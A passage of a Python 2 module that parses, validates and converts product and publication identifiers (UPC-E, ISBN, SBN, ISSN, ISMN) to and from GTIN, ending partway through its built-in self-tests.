Return a UPC E/UPC-8 string based on a GTIN object; the optional flag short = True omits the UPC prefix
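Example (illustrative; mirrors the self-tests):
>>> GTIN_to_UPC8(GTIN('00019100008793'))
'UPC 01987913'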
'''
if not isinstance(gtin, GTIN): gtin = GTIN(str(gtin), **kw)
gtin = GTIN.__str__(gtin, short = True)
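# Zero suppression (the inverse of the expansion in GTIN_from_UPC8):
# take the first branch below whose padding zeros can be elided,
# otherwise the number cannot be represented as UPC-8 and we fail.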
if gtin[:3] != '000': raise ValueError('invalid literal for %s.%s(): %r (manufacturer number too large for zero suppression)' % (GTIN_to_UPC8.__module__, GTIN_to_UPC8.__name__, gtin))
prefix = (not short) and 'UPC ' or ''
if (gtin[5] in '012') and gtin[6:][:4] == '0000': return prefix + gtin[2:][:3] + gtin[-4:][:3] + gtin[5] + gtin[-1]
elif gtin[6:][:5] == '00000': return prefix + gtin[2:][:4] + gtin[-4:][:2] + '3' + gtin[-1]
elif gtin[7:][:5] == '00000': return prefix + gtin[2:][:5] + gtin[-4] + '4' + gtin[-1]
elif (gtin[12] in '56789') and gtin[8:][:4] == '0000': return prefix + gtin[2:][:6] + gtin[-2:]
raise ValueError('invalid literal for %s.%s(): %r (item number too large for zero suppression)' % (GTIN_to_UPC8.__module__, GTIN_to_UPC8.__name__, gtin))
class UPC8(GTIN):
'''
Handle UPC E/UPC-8 as a subset of GTIN.
'''
def __init__(self, s, **kw):
GTIN.__init__(self, GTIN_from_UPC8(s, **kw), **kw)
pass
__str__ = GTIN_to_UPC8
pass
isbn_re = re.compile(
r'''
\A
(?:
(?:ISBN|International[ ]?Standard[ ]?Book[ ]?Number)(?:-?13)?:?
[ ]?
)?
(?P<isbn13>
(?P<isbn13prefix0>978)[- ]?
(?:
(?P<isbn13group0>[02-7])[- ]?
(?:
(?P<isbn13publisher0>[01]\d)[- ]?(?P<isbn13item0>\d{6,6})
|
(?P<isbn13publisher2>[2-6]\d\d)[- ]?(?P<isbn13item2>\d{5,5})
|
(?P<isbn13publisher4>(?:7\d|8[0-4])\d\d)[- ]?(?P<isbn13item4>\d{4,4})
|
(?P<isbn13publisher6>8[5-9]\d\d\d)[- ]?(?P<isbn13item6>\d\d\d)
|
(?P<isbn13publisher8>9[0-4]\d{4,4})[- ]?(?P<isbn13item8>\d\d)
|
(?P<isbn13publisher10>9[5-9]\d{5,5})[- ]?(?P<isbn13item10>\d)
)
|
(?P<isbn13group1>1)[- ]?
(?:
(?P<isbn13publisher1>0\d)[- ]?(?P<isbn13item1>\d{6,6})
|
(?P<isbn13publisher3>[123]\d\d)[- ]?(?P<isbn13item3>\d{5,5})
|
(?P<isbn13publisher5>(?:4\d|5[0-4])\d\d)[- ]?(?P<isbn13item5>\d{4,4})
|
(?P<isbn13publisher7>(?:5[5-9]\d\d|[67]\d\d\d|8[0-5]\d\d|86[0-8]\d|869[0-7])\d)[- ]?(?P<isbn13item7>\d\d\d)
|
(?P<isbn13publisher9>(?:869[89]|8[789]\d\d|9[0-8]\d\d|99[0-8]\d)\d\d)[- ]?(?P<isbn13item9>\d\d)
|
(?P<isbn13publisher11>999\d{4,4})[- ]?(?P<isbn13item11>\d)
)
|
(?P<isbn13group12>(?:8\d|9[0-4]))[- ]?(?P<isbn13opaque12>\d{7,7})
|
(?P<isbn13group13>(?:95\d|9[6-8]\d|99[0-3]))[- ]?(?P<isbn13opaque13>\d{6,6})
|
(?P<isbn13group14>99[4-8]\d)[- ]?(?P<isbn13opaque14>\d{5,5})
|
(?P<isbn13group15>999\d\d)[- ]?(?P<isbn13opaque15>\d{4,4})
)
|
(?P<isbn13prefix16>979)[- ]?
(?:
(?P<isbn13group16>0)[- ]?
(?:
(?P<isbn13publisher16>0\d\d)[- ]?(?P<isbn13item16>\d{5,5})
|
(?P<isbn13publisher17>[1-3]\d\d\d)[- ]?(?P<isbn13item17>\d{4,4})
|
(?P<isbn13publisher18>[4-6]\d{4,4})[- ]?(?P<isbn13item18>\d\d\d)
|
(?P<isbn13publisher19>[78]\d{5,5})[- ]?(?P<isbn13item19>\d\d)
|
(?P<isbn13publisher20>9\d{6,6})[- ]?(?P<isbn13item20>\d)
)
|
(?P<isbn13opaque21>[1-9]\d{8,8})
)
)
(?P<isbn13check>\d)
|
(?:
(?:
(?:ISBN|International[ ]?Standard[ ]?Book[ ]?Number)(?:-?10)?:?
[ ]?
)?
(?P<isbn10>
(?P<isbn10group0>[02-7])[- ]?
(?:
(?P<isbn10publisher0>[01]\d)[- ]?(?P<isbn10item0>\d{6,6})
|
(?P<isbn10publisher2>[2-6]\d\d)[- ]?(?P<isbn10item2>\d{5,5})
|
(?P<isbn10publisher4>(?:7\d|8[0-4])\d\d)[- ]?(?P<isbn10item4>\d{4,4})
|
(?P<isbn10publisher6>8[5-9]\d\d\d)[- ]?(?P<isbn10item6>\d\d\d)
|
(?P<isbn10publisher8>9[0-4]\d{4,4})[- ]?(?P<isbn10item8>\d\d)
|
(?P<isbn10publisher10>9[5-9]\d{5,5})[- ]?(?P<isbn10item10>\d)
)
|
(?P<isbn10group1>1)[- ]?
(?:
(?P<isbn10publisher1>0\d)[- ]?(?P<isbn10item1>\d{6,6})
|
(?P<isbn10publisher3>[123]\d\d)[- ]?(?P<isbn10item3>\d{5,5})
|
(?P<isbn10publisher5>(?:4\d|5[0-4])\d\d)[- ]?(?P<isbn10item5>\d{4,4})
|
(?P<isbn10publisher7>(?:5[5-9]\d\d|[67]\d\d\d|8[0-5]\d\d|86[0-8]\d|869[0-7])\d)[- ]?(?P<isbn10item7>\d\d\d)
|
(?P<isbn10publisher9>(?:869[89]|8[789]\d\d|9[0-8]\d\d|99[0-8]\d)\d\d)[- ]?(?P<isbn10item9>\d\d)
|
(?P<isbn10publisher11>999\d{4,4})[- ]?(?P<isbn10item11>\d)
)
|
(?P<isbn10group12>(?:8\d|9[0-4]))[- ]?(?P<isbn10opaque12>\d{7,7})
|
(?P<isbn10group13>(?:9[5-8]\d|99[0-3]))[- ]?(?P<isbn10opaque13>\d{6,6})
|
(?P<isbn10group14>99[4-8]\d)[- ]?(?P<isbn10opaque14>\d{5,5})
|
(?P<isbn10group15>999\d\d)[- ]?(?P<isbn10opaque15>\d{4,4})
)
|
(?:
(?:SBN|Standard[ ]?Book[ ]?Number):?
[ ]?
)?
(?P<sbn>
(?P<sbnpublisher0>[01]\d)[- ]?(?P<sbnitem0>\d{6,6})
|
(?P<sbnpublisher2>[2-6]\d\d)[- ]?(?P<sbnitem2>\d{5,5})
|
(?P<sbnpublisher4>(?:7\d|8[0-4])\d\d)[- ]?(?P<sbnitem4>\d{4,4})
|
(?P<sbnpublisher6>8[5-9]\d\d\d)[- ]?(?P<sbnitem6>\d\d\d)
|
(?P<sbnpublisher8>9[0-4]\d{4,4})[- ]?(?P<sbnitem8>\d\d)
|
(?P<sbnpublisher10>9[5-9]\d{5,5})[- ]?(?P<sbnitem10>\d)
)
)
(?P<isbn10check>[0-9X])
\Z
''',
re.UNICODE | re.VERBOSE | re.IGNORECASE)
def GTIN_from_ISBN(s, **kw):
'''
Construct a GTIN from a ten-digit or thirteen-digit International
Standard Book Number (ISBN), ISO 2108. Older nine-digit Standard
Book Numbers (SBNs) are supported too. The ten-digit form is
sometimes referred to as ISBN-10 and the thirteen-digit form as
Bookland EAN/ISBN-13.
The optional parameter autocorrect = True corrects incorrect check
digits or check characters; if omitted, an incorrect check digit
or check character will raise a ValueError.
Allowed formats:
ISBN-13: 978xxxxxxxxxc
ISBN-13: 979xxxxxxxxxc
ISBN-10: xxxxxxxxxy
SBN: xxxxxxxxy
978xxxxxxxxxc
979xxxxxxxxxc
xxxxxxxxxy
xxxxxxxxy
NOTE: ISBN-10 or ISBN-13 may be abbreviated ISBN.
NOTE: (I)SBN may be spelled out in full as (International)
Standard Book Number.
NOTE: Case is not significant and whitespace and hyphens are ignored.
NOTE: The colon is optional.
NOTE: There is an unassigned/invalid range of ISBNs:
ISBN 978-6-xxxxxxxx-c,
a.k.a. ISBN 6-xxxxxxxx-y.
Attempting to decode an ISBN in this range will result in a ValueError.
Where: x is a decimal digit,
y is a check character (0-9 or X) [checkPositionModulo],
and c is a decimal check digit [checkStandardModulo].
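Example (illustrative; mirrors the self-tests):
>>> GTIN_from_ISBN('ISBN 0-306-40615-2') == GTIN('0-978-0-306-40615-7')
True
>>> GTIN_from_ISBN('ISBN 0-937383-18-X') == GTIN('0-978-0937383-18-6')
True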
'''
if isinstance(s, GTIN): s = GTIN_to_ISBN(s, **kw)
match = isbn_re.match(''.join(''.join(s.split()).upper().split('-')))
if not match: raise ValueError('invalid literal for %s.%s(): %r' % (GTIN_from_ISBN.__module__, GTIN_from_ISBN.__name__, s))
isbn = (match.group('isbn13') or match.group('isbn10') or match.group('sbn')).zfill(9)
# NOTE: the SBN alternative in isbn_re shares the isbn10check group,
# so there is no separate 'sbncheck' group to consult here.
isbncheck = (match.group('isbn13check') or match.group('isbn10check'))
if len(isbn) == 9:
check = 'X'.join(('%x' % checkPositionModulo(11, [ int(digit, 11) for digit in 'A'.join(isbn.split('X')) ])).upper().split('A'))
if kw.has_key('autocorrect') and kw['autocorrect']: isbncheck = check
if isbncheck != check:
raise ValueError('invalid check character for %s: %s' % (s, isbncheck))
ean = GTIN('978' + isbn + '0', autocorrect = True)
pass
else:
ean = isbn + isbncheck
pass
return GTIN(ean, **kw)
# FIXME: isbn13_override should be handled through assignment of a
# class alias instead...
# only change this while testing
isbn13_override = None
def GTIN_to_ISBN(gtin, short = False, isbn13 = None, **kw):
'''
Construct an International Standard Book Number (ISBN) from a
GTIN. If the optional flag isbn13 = True is provided, the result
is always in ISBN-13 format; if the optional flag isbn13 = False
is provided, the result will be in ISBN-10 format if possible; if
the optional flag isbn13 = None is provided, the system clock will
be checked and the effect will be equivalent to isbn13 = False
before 2007-01-01 and isbn13 = True from that day onward. The
optional flag short = True omits the "ISBN" prefix and hyphens.
NOTE: Hyphens are placed in the appropriate places between group,
publisher, and item in cases where these are known, and omitted
otherwise. The subset of ISBN-13 corresponding to Musicland (ISMN)
is hyphenated according to ISMN conventions.
Returned ISBN-10 formats when flag isbn13 is False:
ISBN x-xx-xxxxxx-y for ISBN range: [02-7]-[01]x-xxxxxx-y, 1-0x-xxxxxx-y
ISBN x-xxx-xxxxx-y for ISBN range: [02-7]-[2-6]xx-xxxxx-y, 1-[123]xx-xxxxx-y
ISBN x-xxxx-xxxx-y for ISBN range: [02-7]-(7x|8[0-4])xx-xxxx-y, 1-(4x|5[0-4])xx-xxxx-y
ISBN x-xxxxx-xxx-y for ISBN range: [02-7]-8[5-9]xxx-xxx-y, 1-(5[5-9]xx|[67]xxx|8[0-5]xx|86[0-8]x|869[0-7])x-xxx-y
ISBN x-xxxxxx-xx-y for ISBN range: [02-7]-9[0-4]xxxx-xx-y, 1-(869[89]|8[789]xx|9[0-8]xx|99[0-8]x)xx-xx-y
ISBN x-xxxxxxx-x-y for ISBN range: [02-7]-9[5-9]xxxxx-x-y, 1-999xxxx-x-y
ISBN xx-xxxxxxx-y for ISBN range: (8\d|9[0-4])-xxxxxxx-y
ISBN xxx-xxxxxx-y for ISBN range: (9[5-8]x|99[0-3])-xxxxxx-y
ISBN xxxx-xxxxx-y for ISBN range: 99[4-8]x-xxxxx-y
ISBN xxxxx-xxxx-y for ISBN range: 999xx-xxxx-y
Returned ISBN-13 formats when flag isbn13 is True:
ISBN 978-x-xx-xxxxxx-c for Bookland (ISBN) range: 978-[02-7]-[01]x-xxxxxx-c, 978-1-0x-xxxxxx-c
ISBN 978-x-xxx-xxxxx-c for Bookland (ISBN) range: 978-[02-7]-[2-6]xx-xxxxx-c, 978-1-[1-3]xx-xxxxx-c
ISBN 978-x-xxxx-xxxx-c for Bookland (ISBN) range: 978-[02-7]-(7x|8[0-4])xx-xxxx-c, 978-1-(4x|5[0-4])xx-xxxx-c
ISBN 978-x-xxxxx-xxx-c for Bookland (ISBN) range: 978-[02-7]-8[5-9]xxx-xxx-c, 978-1-(5[5-9]xx|[67]xxx|8[0-5]xx|86[0-8]x|869[0-7])x-xxx-c
ISBN 978-x-xxxxxx-xx-c for Bookland (ISBN) range: 978-[02-7]-9[0-4]xxxx-xx-c, 978-1-(869[89]|8[7-9]xx|9[0-8]xx|99[0-8]x)xx-xx-c
ISBN 978-x-xxxxxxx-x-c for Bookland (ISBN) range: 978-[02-7]-9[5-9]xxxxx-x-c, 978-1-999xxxx-x-c
ISBN 978-xx-xxxxxxx-c for Bookland (ISBN) range: 978-(8\d|9[0-4])-xxxxxxx-c
ISBN 978-xxx-xxxxxx-c for Bookland (ISBN) range: 978-(9[5-8]x|99[0-3])-xxxxxx-c
ISBN 978-xxxx-xxxxx-c for Bookland (ISBN) range: 978-99[4-8]x-xxxxx-c
ISBN 978-xxxxx-xxxx-c for Bookland (ISBN) range: 978-999xx-xxxx-c
Returned ISBN-13 formats (979 prefix; these have no ISBN-10 form):
ISBN 979-0-xxx-xxxxx-c for Musicland (ISMN) range 979-0-0xx-xxxxx-c
ISBN 979-0-xxxx-xxxx-c for Musicland (ISMN) range 979-0-[123]xxx-xxxx-c
ISBN 979-0-xxxxx-xxx-c for Musicland (ISMN) range 979-0-[456]xxxx-xxx-c
ISBN 979-0-xxxxxx-xx-c for Musicland (ISMN) range 979-0-[78]xxxxx-xx-c
ISBN 979-0-xxxxxxx-x-c for Musicland (ISMN) range 979-0-9xxxxxx-x-c
ISBN 979-xxxxxxxxx-c for Bookland (ISBN) range: 979-[1-9]xxxxxxxx-c
Where: x is a decimal digit,
y is a check character (0-9 or X) [checkPositionModulo],
and c is a decimal check digit [checkStandardModulo].
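Example (illustrative; mirrors the self-tests):
>>> GTIN_to_ISBN('0-978-0-306-40615-7', isbn13 = False)
'ISBN 0-306-40615-2'
>>> GTIN_to_ISBN('0-978-0-306-40615-7', isbn13 = True)
'ISBN 978-0-306-40615-7'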
'''
if isbn13 is None: isbn13 = isbn13_override
if isbn13 is None: isbn13 = time.gmtime()[0] >= 2007
if not isinstance(gtin, GTIN): gtin = GTIN(str(gtin), **kw)
gtin = GTIN.__str__(gtin, short = True)
if gtin[:4] not in ('0978', '0979'):
raise ValueError('invalid literal for %s.%s(): %r' % (GTIN_to_ISBN.__module__, GTIN_to_ISBN.__name__, gtin))
if (gtin[:4] == '0978') and not isbn13:
isbn = gtin[4:][:-1]
isbn = 'ISBN ' + isbn + 'X'.join(('%x' % checkPositionModulo(11, [ int(digit, 11) for digit in 'A'.join(isbn.split('X')) ])).upper().split('A'))
else: isbn = 'ISBN ' + gtin[1:]
match = isbn_re.match(isbn)
assert match is not None
o = []
if not short: o.append('ISBN ')
parts = []
for variety in ('isbn13', 'isbn10', 'sbn'):
for partname in ('prefix', 'group', 'publisher', 'item', 'opaque', 'check'):
for key, value in match.groupdict().iteritems():
if key.startswith(variety + partname) and value is not None:
parts.append(value)
break
pass
pass
if len(parts): break
pass
o.append(((not short) and '-' or '').join(parts))
return ''.join(o)
class ISBN(GTIN):
'''
Handle ISBN as a subset of GTIN.
Not handled yet: five-digit price code extension a.k.a. "UPC5",
which are sometimes printed to the right of the EAN-13 barcode:
UPC-5 (a.k.a. EAN/5 or EAN/9) format:
daaaa>
Where: d is the currency code,
aaaa is the amount,
and > is the optional "quiet zone" character
Examples:
0xxxx = Reserved (formerly GBP xxxx)
00000 = No designated price (do not use)
1xxxx = USD 1xx.xx (formerly GBP xxxx)
2xxxx = USD 2xx.xx
3xxxx = USD 3xx.xx (formerly AUD xx.xx)
4xxxx = USD 4xx.xx (formerly NZD xx.xx)
5xxxx = USD xx.xx
50000 = No designated price (do not use)
59999 = Price exceeds USD 99.98 (manual entry)
6xxxx = Ignored (formerly CAD xx.xx)
7xxxx = Ignored
8xxxx = Ignored
90000-98999 = Internal use range
90000 = No price specified (BISG recommended)
99xxx = Reserved for special use
9999x = Reserved for National Association of College Stores (NACS)
99990 = NACS used books
99991 = NACS desk copies/complimentary
The barcode form encodes a UPC-like check digit (alternating
weights 3 9 3 9 3) in the parity of the digits.
In the ISBN format, the price is printed after the ISBN with two spaces:
ISBN 0-425-05382-2 2.75
'''
def __init__(self, s, **kw):
GTIN.__init__(self, GTIN_from_ISBN(s, **kw), **kw)
pass
__str__ = GTIN_to_ISBN
pass
issn_re = re.compile(
r'''
\A
ISSN:?
[ ]?
(?P<issn>
\d{4,4}-?\d\d\d
)
(?P<issncheck>[0-9X])
\Z
''',
re.UNICODE | re.VERBOSE | re.IGNORECASE)
def GTIN_from_ISSN(s, **kw):
'''
Construct a GTIN from an eight-digit International Standard Serial
Number (ISSN), ISO 3297.
The optional parameter autocorrect = True corrects incorrect check
characters; if omitted, an incorrect check character will raise a
ValueError.
Allowed format:
ISSN: xxxx-xxxy
NOTE: Case is not significant and whitespace and hyphens are ignored.
NOTE: The colon is optional.
Where: x is a decimal digit,
and y is a check character (0-9 or X) [checkPositionModulo].
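Example (illustrative; mirrors the self-tests):
>>> GTIN_from_ISSN('ISSN 0953-4563') == GTIN('09770953456001')
True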
'''
if isinstance(s, GTIN): s = GTIN_to_ISSN(s)
match = issn_re.match(''.join(''.join(s.split()).upper().split('-')))
if not match: raise ValueError('invalid literal for %s.%s(): %r' % (GTIN_from_ISSN.__module__, GTIN_from_ISSN.__name__, s))
issn = (match.group('issn')).zfill(7)
issncheck = match.group('issncheck')
check = 'X'.join(('%x' % checkPositionModulo(11, [ int(digit, 11) for digit in 'A'.join(issn.split('X')) ])).upper().split('A'))
if kw.has_key('autocorrect') and kw['autocorrect']: issncheck = check
if issncheck != check:
raise ValueError('invalid check character for %s: %s' % (s, issncheck))
kw['autocorrect'] = True
return GTIN('977' + issn + '000', **kw)
def GTIN_to_ISSN(gtin, short = False, **kw):
'''
Construct an International Standard Serial Number (ISSN) from a
GTIN. The optional flag short = True omits colon, space and hyphen.
Returned format (without flag short = True):
ISSN: xxxx-xxxy
Returned format (with flag short = True):
ISSNxxxxxxxy
Where: x is a decimal digit,
and y is a check character (0-9 or X) [checkPositionModulo].
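Example (illustrative; mirrors the self-tests):
>>> GTIN_to_ISSN('09770953456001')
'ISSN: 0953-4563'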
'''
if not isinstance(gtin, GTIN): gtin = GTIN(str(gtin), **kw)
gtin = GTIN.__str__(gtin, short = True)
if gtin[:4] != '0977':
raise ValueError('invalid literal for %s.%s(): %r' % (GTIN_to_ISSN.__module__, GTIN_to_ISSN.__name__, gtin))
issn = gtin[4:][:-3]
prefix, hyphen = (not short) and ('ISSN: ', '-') or ('ISSN', '')
return prefix + issn[:4] + hyphen + issn[4:] + 'X'.join(('%x' % checkPositionModulo(11, [ int(digit, 11) for digit in 'A'.join(issn.split('X')) ])).upper().split('A'))
class ISSN(GTIN):
'''
Handle ISSN as a subset of GTIN.
Not implemented yet: two-digit price code, written in the EAN
right after the ISSN (currently fixed at 00); this is 00 for
normal issues, other values for special issues, double issues,
etc.
Not implemented yet: publication issue number, a two- or
five-digit add-on managed by the publisher and separated from the
EAN by a blank space (the format and the meaning assigned to it
vary by country). For example, 03 might represent the March
issue (third month of the year) for a monthly periodical.
'''
def __init__(self, s, **kw):
GTIN.__init__(self, GTIN_from_ISSN(s, **kw), **kw)
pass
__str__ = GTIN_to_ISSN
pass
ismn_re = re.compile(
r'''
\A
(?:
(?:
(?:ISMN|International Standard Music Number)(?:-?10)?:?[ ]?
)?
(?P<prefix0>M)
|
(?:
(?:ISMN|International Standard Music Number)(?:-?13)?:?[ ]?
)?
(?P<prefix1>979[- ]?0)
)
[- ]?
(?P<ismn>
0\d\d[- ]?\d{5,5}
|
[1-3]\d\d\d[- ]?\d{4,4}
|
[4-6]\d{4,4}[- ]?\d\d\d
|
[78]\d{5,5}[- ]?\d\d
|
9\d{6,6}[- ]?\d
)
[- ]?
(?P<ismncheck>\d)
\Z
''',
re.UNICODE | re.VERBOSE | re.IGNORECASE)
ismn_publisher_length = [ 3, 4, 4, 4, 5, 5, 5, 6, 6, 7 ]
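# Illustrative example: for ismn = '34512345' the first digit is 3, so
# ismn_publisher_length[3] == 4 splits it into publisher '3451' and
# item '2345' (cf. 'ISMN M-3451-2345-8' in the self-tests below).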
def GTIN_from_ISMN(s, **kw):
'''
Construct a GTIN from an International Standard Music
Number (ISMN), ISO 10957. Supports both the current 10-character
ISMNs (ISMN-10) and the proposed 13-character EAN.UCC "Musicland"
ISMNs (ISMN-13).
The optional parameter autocorrect = True corrects incorrect check
characters; if omitted, an incorrect check character will raise a
ValueError.
Allowed formats:
ISMN M-321-76543-6
ISMN 979-0-123-45678-3
(Reading ISMN 979-0-123-45678-3 left to right: "979-0" is the
prefix, "123" the publisher, "45678" the item, and "3" the check
digit.)
NOTE: ISMN may be spelled out in full as International Standard
Music Number.
NOTE: Case is not significant and whitespace and hyphens are
interchangeable and optional.
NOTE: A colon is allowed after ISMN on input but not generated on
output.
NOTE: The publisher and item are variable-length but combined they
are always eight digits. The length of the publisher portion
depends on the first digit as follows:
0: 3 digits
1, 2, 3: 4 digits
4, 5, 6: 5 digits
7, 8: 6 digits
9: 7 digits
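Example (illustrative; mirrors the self-tests):
>>> GTIN_from_ISMN('ISMN M-706700-00-7') == GTIN('9790706700007')
True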
'''
if isinstance(s, GTIN): s = GTIN_to_ISMN(s)
match = ismn_re.match(''.join(''.join(s.upper().split()).split('-')))
if not match: raise ValueError('invalid literal for %s.%s(): %r' % (GTIN_from_ISMN.__module__, GTIN_from_ISMN.__name__, s))
prefix = (match.group('prefix0') or match.group('prefix1')).upper()
ismn = ''.join(''.join(match.group('ismn').split()).split('-'))
split = ismn_publisher_length[int(ismn[0])]
publisher, item = ismn[:split], ismn[split:]
ismncheck = match.group('ismncheck')
digits = '3' + ismn
check = str(checkStandardModulo(10, [ int(digit) for digit in digits ]))
if kw.has_key('autocorrect') and kw['autocorrect']: ismncheck = check
if ismncheck != check:
raise ValueError('invalid check character for %s: %s' % (s, ismncheck))
ean = '9790' + ismn + ismncheck
return GTIN(ean, **kw)
def GTIN_to_ISMN(gtin, short = False, **kw):
'''
Construct an International Standard Music Number (ISMN) from a
GTIN. The optional flag short = True omits the ISMN prefix and
hyphens.
The length of the publisher portion depends on its first digit,
as in GTIN_from_ISMN:
0: 3 digits
1, 2, 3: 4 digits
4, 5, 6: 5 digits
7, 8: 6 digits
9: 7 digits
Returned formats (without short = True):
ISMN M-xxx-xxxxx-c
ISMN M-xxxx-xxxx-c
ISMN M-xxxxx-xxx-c
ISMN M-xxxxxx-xx-c
ISMN M-xxxxxxx-x-c
Returned formats (with short = True):
Mxxxxxxxxc
Where: x is a decimal digit,
and c is a decimal check digit [checkStandardModulo].
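Example (illustrative; mirrors the self-tests):
>>> GTIN_to_ISMN('9790345123458')
'ISMN M-3451-2345-8'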
'''
if not isinstance(gtin, GTIN): gtin = GTIN(str(gtin), **kw)
gtin = GTIN.__str__(gtin, short = True)
if gtin[:5] != '09790':
raise ValueError('invalid literal for %s.%s(): %r' % (GTIN_to_ISMN.__module__, GTIN_to_ISMN.__name__, gtin))
ismn, ismncheck = gtin[5:-1], gtin[-1]
split = ismn_publisher_length[int(ismn[0])]
publisher, item = ismn[:split], ismn[split:]
prefix, hyphen = (not short) and ('ISMN ', '-') or ('', '')
return prefix + 'M' + hyphen + publisher + hyphen + item + hyphen + ismncheck
class ISMN(GTIN):
'''
Handle ISMN as a subset of GTIN.
'''
def __init__(self, s, **kw):
GTIN.__init__(self, GTIN_from_ISMN(s, **kw), **kw)
pass
__str__ = GTIN_to_ISMN
pass
def test():
'''
Self-tests for the GTIN module
'''
# test the standard modulo check digit calculator (positive tests)
for base, digits, ck in (
# UPC/UCC-12
(10, '61414121022- ', 0),
# EAN/UCC-13
(10, '101454121022- ', 3),
# EAN/UCC-14
(10, '9101454121022- ', 6),
# SSCC
(10, '10614141192837465- ', 7),
(10, '37610425002123456- ', 9),
# BoL
(10, '0614141192837465- ', 0),
# EAN/UCC-8
(10, '4321012- ', 1),
):
try: assert checkStandardModulo(base, [ int(digit, 10) for digit in ''.join(''.join(digits.split()).split('-')) ]) == ck
except:
print 'checkStandardModulo failed for:'
print ' base =', base
print ' digits =', digits
print ' ck =', ck
raise
pass
# test the standard modulo check digit calculator (negative tests)
for base, digits, ck in (
# UPC/UCC-12
(10, '61414121022- ', 1),
# EAN/UCC-13
(10, '101454121022- ', 0),
# EAN/UCC-14
(10, '9101454121022- ', 4),
# SSCC
(10, '10614141192837465- ', 3),
# BoL
(10, '0614141192837465- ', 9),
# EAN/UCC-8
(10, '4321012- ', 2),
):
try: assert checkStandardModulo(base, [ int(digit, 10) for digit in ''.join(''.join(digits.split()).split('-')) ]) != ck
except:
print 'checkStandardModulo failed for:'
print ' base =', base
print ' digits =', digits
print ' ck =', ck
raise
pass
# test the GTIN constructor (positive tests)
for s in (
'011594022019',
'00614141210220',
'01014541210223',
'91014541210226',
'00000043210121',
'614141210220',
'1014541210223',
'43210121',
'50285549',
'0 48500 00102 8',
'978-0-11-000222-4',
):
try: GTIN(s)
except:
print 'GTIN failed for s =', s
raise
pass
# test the GTIN constructor (negative tests)
for s in (
'00614141210221',
'01014541210220',
'91014541210224',
'00000043210122',
'614141210221',
'1014541210220',
'43210122',
'000614141210220',
'0001014541210223',
'00091014541210226',
'000000000043210121',
'106141411928374657',
'06141411928374650',
'106141411928374653',
'06141411928374659',
'9786000000004',
'81014541210229',
):
try: GTIN(s)
except ValueError, v: pass
else:
print 'GTIN should have failed for s =', s
assert False
pass
pass
# test the GTIN constructor and the GTIN str() implementation
assert str(GTIN('91014541210226')) == '91014541210226'
assert GTIN('91014541210226').__str__(short = True) == '91014541210226'
assert str(GTIN('01014541210223')) == '01014541210223'
assert GTIN('01014541210223').__str__(short = True) == '01014541210223'
assert str(GTIN('00614141210220')) == '00614141210220'
assert GTIN('00614141210220').__str__(short = True) == '00614141210220'
assert str(GTIN('00000043210121')) == '00000043210121'
assert GTIN('00000043210121').__str__(short = True) == '00000043210121'
assert str(GTIN( '1014541210223')) == '01014541210223'
assert GTIN( '1014541210223').__str__(short = True) == '01014541210223'
assert str(GTIN( '614141210220')) == '00614141210220'
assert GTIN( '614141210220').__str__(short = True) == '00614141210220'
assert str(GTIN( '43210121')) == '00000043210121'
assert GTIN( '43210121').__str__(short = True) == '00000043210121'
# test the EAN14, EAN13, UPC12, and EAN8 wrapper classes
assert str(EAN14('91014541210226')) == 'EAN 91014541210226'
assert EAN14('91014541210226').__str__(short = True) == '91014541210226'
assert str(EAN13( '1014541210223')) == 'EAN 1014541210223'
assert EAN13( '1014541210223').__str__(short = True) == '1014541210223'
assert str(UPC12( '614141210220')) == 'UPC 614141210220'
assert UPC12( '614141210220').__str__(short = True) == '614141210220'
assert str( EAN8( '43210121')) == 'EAN 43210121'
assert EAN8( '43210121').__str__(short = True) == '43210121'
assert str(EAN14('EAN 91014541210226')) == 'EAN 91014541210226'
assert EAN14('EAN 91014541210226').__str__(short = True) == '91014541210226'
assert str(EAN13( 'EAN 1014541210223')) == 'EAN 1014541210223'
assert EAN13( 'EAN 1014541210223').__str__(short = True) == '1014541210223'
assert str(UPC12( 'UPC 614141210220')) == 'UPC 614141210220'
assert UPC12( 'UPC 614141210220').__str__(short = True) == '614141210220'
assert str( EAN8( 'EAN 43210121')) == 'EAN 43210121'
assert EAN8( 'EAN 43210121').__str__(short = True) == '43210121'
# test the GTIN comparison implementation
assert GTIN('91014541210226') == GTIN('91014541210226')
assert GTIN('01014541210223') == GTIN('01014541210223')
assert GTIN('00614141210220') == GTIN('00614141210220')
assert GTIN('00000043210121') == GTIN('00000043210121')
assert GTIN( '1014541210223') == GTIN('01014541210223')
assert GTIN( '614141210220') == GTIN('00614141210220')
assert GTIN( '43210121') == GTIN('00000043210121')
assert GTIN( '43210122', autocorrect = True) == GTIN('00000043210121')
assert GTIN('91014541210226') > GTIN('01014541210223')
assert GTIN('00000043210121') < GTIN('00614141210220')
assert GTIN( '1014541210223') != GTIN('00614141210220')
# test the GTIN check character autocorrection feature, stringification, and comparison
for r, s in (
('91014541210226', '91014541210224'),
('01014541210223', '01014541210220'),
('00614141210220', '00614141210221'),
('00000043210121', '00000043210122'),
):
assert GTIN(r) == GTIN(s, autocorrect = True)
assert str(GTIN(r)) == str(GTIN(s, autocorrect = True))
assert GTIN(r).__str__(short = True) == GTIN(s, autocorrect = True).__str__(short = True)
pass
# make sure comparisons between GTINs and non-GTINs raise a TypeError
try:
tmp = GTIN('91014541210226') != '91014541210226'
assert tmp
except TypeError, t: pass
else: raise RuntimeError('comparison between GTIN and string should not work')
try:
tmp = '01014541210223' != GTIN('01014541210223')
assert tmp
except TypeError, t: pass
else: raise RuntimeError('comparison between GTIN and string should not work')
# test accessors
i = GTIN('01014541210223')
assert i.gtin == '0101454121022'
assert i.gtincheck == '3'
# test whitespace and hyphen removal
assert GTIN('0 48500 00102 8') == GTIN('00048500001028')
# test UPC E/UPC-8 conversion
assert GTIN_from_UPC8('01987913') == GTIN('00019100008793')
assert GTIN_to_UPC8(GTIN('00019100008793')) == 'UPC 01987913'
# test the UPC8 wrapper class
assert UPC8('01987913') == GTIN('00019100008793')
assert UPC8('UPC 01987913') == GTIN('00019100008793')
assert str(UPC8('01987913')) == 'UPC 01987913'
assert UPC8('01987913').__str__(short = True) == '01987913'
# test ISBN conversion
assert GTIN_from_ISBN('SBN 306-40615-2') == GTIN('0-978-0-306-40615-7')
assert GTIN_from_ISBN('ISBN 5864551155') == GTIN('0-978-586455115-8')
assert GTIN_from_ISBN('ISBN 3896254170') == GTIN('0-978-389625417-7')
assert GTIN_from_ISBN('ISBN 3-89625-417-0') == GTIN('0-978-3-89625-417-7')
assert GTIN_from_ISBN('ISBN 0-306-40615-2') == GTIN('0-978-0-306-40615-7')
assert GTIN_from_ISBN('ISBN 0201530821') == GTIN('0-978-020153082-7')
